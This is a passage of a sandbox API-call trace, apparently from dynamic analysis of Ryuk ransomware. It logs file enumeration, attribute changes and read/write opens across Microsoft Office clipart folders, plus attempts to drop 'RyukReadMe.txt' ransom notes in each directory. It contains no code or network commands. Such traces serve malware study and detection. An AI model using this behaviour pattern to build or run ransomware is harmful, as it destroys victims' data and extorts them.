(hObject=0xffffffffffffffff) returned 0 [0133.990] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.990] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.990] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF", dwFileAttributes=0x80) returned 0 [0133.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.990] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.990] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.990] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF", dwFileAttributes=0x80) returned 0 [0133.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.991] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.991] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.991] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF", dwFileAttributes=0x80) returned 0 [0133.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.992] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.992] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.992] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF", dwFileAttributes=0x80) returned 0 [0133.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.993] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.993] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.993] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF", dwFileAttributes=0x80) returned 0 [0133.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.993] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.994] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.994] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF", dwFileAttributes=0x80) returned 0 [0133.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.994] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.994] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.994] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.994] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF", dwFileAttributes=0x80) returned 0 [0133.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.995] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.995] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.995] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF", dwFileAttributes=0x80) returned 0 [0133.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.996] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.996] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.996] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.996] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF", dwFileAttributes=0x80) returned 0 [0133.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.997] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.997] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.997] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.997] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF", dwFileAttributes=0x80) returned 0 [0133.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.997] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.997] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.997] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.997] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF", dwFileAttributes=0x80) returned 0 [0133.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.998] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.998] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.998] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.998] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.998] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF", dwFileAttributes=0x80) returned 0 [0133.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.998] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.998] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.999] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.001] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF", dwFileAttributes=0x80) returned 0 [0134.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.001] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.001] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.001] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.001] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF", dwFileAttributes=0x80) returned 0 [0134.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.002] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.002] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF", dwFileAttributes=0x80) returned 0 [0134.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.002] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.002] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF", dwFileAttributes=0x80) returned 0 [0134.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.003] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.003] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.003] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF", dwFileAttributes=0x80) returned 0 [0134.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.004] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.004] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.004] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.004] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.004] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID", dwFileAttributes=0x80) returned 0 [0134.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.004] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.004] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.004] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.004] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF", dwFileAttributes=0x80) returned 0 [0134.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.005] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.005] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.005] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF", dwFileAttributes=0x80) returned 0 [0134.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.005] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.005] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.006] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF", dwFileAttributes=0x80) returned 0 [0134.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.006] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.006] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.006] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.006] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF", dwFileAttributes=0x80) returned 0 [0134.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.006] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.006] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.007] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.007] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF", dwFileAttributes=0x80) returned 0 [0134.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.008] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.008] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.008] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0134.008] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0134.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF", dwFileAttributes=0x80) returned 0 [0134.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0134.009] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0134.009] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.009] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.447] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0135.450] SetLastError (dwErrCode=0x0) [0135.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.455] GetLastError () returned 0x5 [0135.455] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.455] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.455] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.455] SetLastError (dwErrCode=0x0) [0135.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.455] GetLastError () returned 0x5 [0135.455] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.455] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.455] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0135.456] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.456] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.456] SetLastError (dwErrCode=0x0) [0135.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.456] GetLastError () returned 0x5 [0135.456] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.456] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.456] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0135.457] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.458] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.458] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF", dwFileAttributes=0x80) returned 0 [0135.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143743.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143743.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.458] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.458] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.458] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.458] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF", dwFileAttributes=0x80) returned 0 [0135.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143744.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143744.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.459] CloseHandle (hObject=0xffffffffffffffff) returned 0 